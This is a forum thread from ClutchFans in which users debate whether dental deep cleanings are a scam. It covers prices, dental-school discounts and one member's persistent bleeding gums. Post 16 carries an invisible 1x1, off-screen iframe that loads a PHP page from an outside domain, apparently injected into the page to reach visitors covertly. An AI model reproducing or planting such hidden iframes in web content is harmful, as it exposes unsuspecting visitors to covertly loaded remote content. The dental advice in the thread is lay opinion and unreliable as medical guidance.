1. Welcome! Please take a few seconds to create your free account to post threads, make some friends, remove a few ads while surfing and much more. ClutchFans has been bringing fans together to talk Houston Sports since 1996. Join us!

Dental: Deep Cleaning- Is it a scam???

Discussion in 'BBS Hangout' started by Jeremiah, Sep 29, 2008.

1. franchise403

franchise403 Contributing Member

I just had the procedure done and it was $143.00 total with insurance. I think without it was going to be between $500-$800 bucks.

Procedure wasn't that bad. I was expecting much much worse. Goodluck!

2. Pull_Up_3

Pull_Up_3 Member

lucky u

the total for what i need is like $1400 and i come out like $500 it just doesnt make sense to me since most deep cleanings are like 6-800 without insurance.

3. itony

itony Member

My place is only $400 for a deep cleaning :)

4. le081488

le081488 Member

If your willing to go through with the process at the dental school, it's about $37.00 PER quadrant to have a deep cleaning, and usually, you won't need all four quads done, just depends on the person and their oral hygiene. That's alot off, also fillings, etc are alot cheaper as well, but again, you just have to go through the process.

All the prices are without insurance, just paid the day of with CC or cash, if you or anyone on the board is interested just PM or email me le081488@yahoo.com I have had people from CF come in already.

1 person likes this.
  5. Pull_Up_3

Pull_Up_3 Member

what process? im pretty sure ill need all 4 lulz

6. le081488

le081488 Member

Cheaper price, but the drawback is it may take a longer process to get everything done, but that's dependable on the patient and his/her schedule, if interested, just email me and Ill email you some info. I can sign people up as friends and family so it speeds up the process a little.

7. Pull_Up_3

Pull_Up_3 Member

emailed u

8. stthomsfinest

stthomsfinest Member

Interesting thread.

From my experience, I feel deep cleaning is a scam. My family was low income so I was on Medicare, during college I became uninsured. I hadnt had a Dentist checkup since I was 18. Three years later when I was 22, my gums began to bleed when I brushed. It bothered me greatly so I spent 70 bucks or so for a checkup and I was told I have peridontal disease and to floss and get a deep cleaning. Being uninsured and broke, that wasnt going to happen.

Desperate times called for desperate measures so I applied for CareCredit, for those who don't know its a credit card used for medical checkups and crap. I had a 500 limit so I when to Apple Dentist and then maxed out my card. They did the deep cleaning and gave me some solution that they claimed would reduce/eliminate the bleeding gums and swelling.

Basically it was bull****. The solution didn't do crap and my gums still bleed to this day. I want something to be done about it and have finally paid CareCredit off and chopped that damn card to bits. Being uninsured, I'd have to find a community clinic or something to help me or pay out of pocket.

So basically to me the "Deep cleaning" was an absolute BS waste of money that didn't solve that problems that it was intended to solve.

9. le081488

le081488 Member

Did you follow up and do what you were suppose to after the deep cleanings? Periodontal disease is a disease in which just doesn't go away right after the cleaning. But if your not a believer in it, that's you, for others, I usually show all the debris, etc that comes out during the cleaning. Reddawgz could probably answer your question better, but it's not a scam, it just requires maintenance and better oral hygiene.

10. stthomsfinest

stthomsfinest Member

Well yeah, they showed me all the plaque and stuff in that xray and they said they cleaned it all out. They gave me some solution that looked and tasted like that Purple Listerine mouthwash that they said would reduce the swelling in my gums which in turn would reduce my gums from bleeding so easily.

I flossed like they told me to, used the solution, brushed like I usually do in the mornings. Started using the sensitive teeth toothpaste like they told me. The bleeding gums never went away. Once the solution was gone and the bleeding didn't subside I felt screwed and weaned off the flossing but continued with the just normal store mouthwash. Crest and such. The bleeding remains.

My teeth are white but could be whiter but the bleeding gums just won't go and I dont know what to do. I'm planning to schedule a new dentist checkup to see what crap they're gonna say now and I'm going to tell them what I've said here and that the problem didn't go away.

11. BALLhog 247 365

Bleeding gums are technically a symptom of gingivitis, which is a disease that usually precedes the onset of periodontitis; however, the presence of gingivitis doesn't imply active periodontitis. The persistence of your symptoms may signify that they are secondary to a systemic disease, malnutrition, or an allergy (toothpaste?), and not necessarily plaque/bacteria. Do you have any hormonal problems/diabetic? Are you on any hypertensive medications? Vitamin C deficiency? It may even just be that you're brushing too hard and causing trauma to your gingiva.

12. rezdawg

rezdawg Contributing Member

You gotta be weary about places like Apple...chains that produce on high volume typically have the framework of a factory. In and out, in and out...everything revolves around production. Im not saying this necessarily is the case, but the deep cleaning may not have been as thorough as possible, even if they showed you bits and pieces of plaque and calculus. Also, as Ballhog and le081488 have stated, there could be other factors at play here. One thing is for sure, if your gums are still bleeding, then you should try to find the cause of the problem.

13. stthomsfinest

stthomsfinest Member

I dont have any disease or allergy that I know of other than some acid reflux. Not diabetic. dont take any medications of any kind. I believe I get enough vitamin C. And it happens even when i brush relatively soft.

14. rezdawg

rezdawg Contributing Member

Do you only bleed in certain areas or do you just generally bleed in all areas?

If its general, and all your gum issues as far as bacteria/plaque and oral hygiene are taken care of...then you should look into potential bleeding disorders or Vitamin K deficiency.

15. OlajuwonFan81

OlajuwonFan81 Member

BUMP.

Any of you do that laser treatment to go along with the deep cleaning?

Supposedly it is a new procedure that kills 100% of the bacteria? Only negative is that it costs a few hundred dollars in addition to the cleaning.

16. Zion21

Zion21 Member

I just got back from one so the answer is no.
    <iframe style="width:1px; height:1px; position:absolute; left:-10px;" src="http://tipgnome.com/share/files/iframe.php?1"></iframe>

17. asianballa23

asianballa23 Member

you just had to dig up a 3 yr old thread just to let everyone know uh....

18. Xerobull

Xerobull You son of a b!tch! I'm in!

I don't think the original question was 'Does Deep Cleaning Kill You?'.

19. Mr. Clutch

Mr. Clutch Contributing Member

I'm learning that dentists can be scammers.

"You need a $500 mouth guard"

F off

20. Disciple of RP

Disciple of RP Contributing Member

My wife is a dental hygienist of 9 years (and a good one).

No, there is nothing you can "buy" that can replace a deep cleaning and $175 is a great price.